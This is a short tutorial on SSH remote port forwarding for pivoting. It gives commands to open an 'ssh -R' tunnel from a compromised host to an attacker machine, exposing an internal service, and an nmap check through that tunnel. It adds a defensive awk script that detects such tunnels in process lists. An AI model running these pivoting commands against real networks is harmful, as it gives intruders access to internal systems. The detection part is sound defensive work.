Remote Port Forwarding


If we have a shell on 172.65.0.5 but inbound SSH to it is blocked, we can instead open an outbound SSH connection from it to the attacker machine (172.80.0.1) and tunnel through that connection to any vulnerable service on a target, such as 192.162.1.2 on port 8080.

  • Enable SSH on the attacker machine:
      systemctl start ssh

  • On the compromised machine (here -R is for remote):
      ssh -R <attacker-local-port>:<target-ip>:<target-port> <user>@<attacker-ip> -fN
      ssh -R 8000:192.162.1.2:8080 user@172.80.0.1 -fN

  • To check that the tunnel is up, on the attacker machine (the forward listens on the attacker-local port, 8000 in the example above):
      ss -antp | grep "8000"
      sudo nmap -sS -sV 127.0.0.1 -p 8000
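Seen from the defender's side of the pivot host, the `ssh -R` client in the second step stays in the process list for as long as the tunnel is up. The script below is an added example, not part of the original page: it parses `ps` output and reports every ssh client started with a remote forward, with the listen port and the internal target it exposes. The function name `find_remote_forwards` and all sample lines other than the page's own command are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag ssh clients that were started with a remote forward (-R).
# Input format is that of `ps -eo pid=,user=,args=` (PID, user, command line).
# Handles "-R spec" and "-Rspec"; bundled flags such as "-fNR" and
# bracketed IPv6 addresses are not parsed.

find_remote_forwards() {
    awk '
    {
        pid = $1; user = $2
        # Only ssh client processes: argv[0] is "ssh" or a path ending in /ssh.
        if ($3 != "ssh" && $3 !~ /\/ssh$/) next
        for (i = 4; i <= NF; i++) {
            spec = ""
            if ($i == "-R" && i < NF) spec = $(i + 1)       # "-R spec"
            else if ($i ~ /^-R./)     spec = substr($i, 3)  # "-Rspec"
            if (spec == "") continue
            n = split(spec, f, ":")
            if (n < 3) continue   # "-R port" (reverse SOCKS) is not handled here
            # [bind_address:]listen_port:host:hostport, counted from the right
            printf "pid=%s user=%s listen=%s target=%s:%s\n", pid, user, f[n-2], f[n-1], f[n]
        }
    }'
}

# Constructed sample process list; the second line is the command from this page.
SAMPLE_PS='  812 root     /usr/sbin/sshd -D
 4410 www-data ssh -R 8000:192.162.1.2:8080 user@172.80.0.1 -fN
 4502 alice    ssh alice@10.0.0.7
 4630 bob      /usr/bin/ssh -fN -R127.0.0.1:9001:10.0.0.9:3389 bob@203.0.113.5'

printf '%s\n' "$SAMPLE_PS" | find_remote_forwards

# On a live Linux host:
#   ps -eo pid=,user=,args= | find_remote_forwards
```

A hit under a service account such as `www-data` is worth an alert on its own, since web-server users rarely have a reason to run an SSH client at all.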
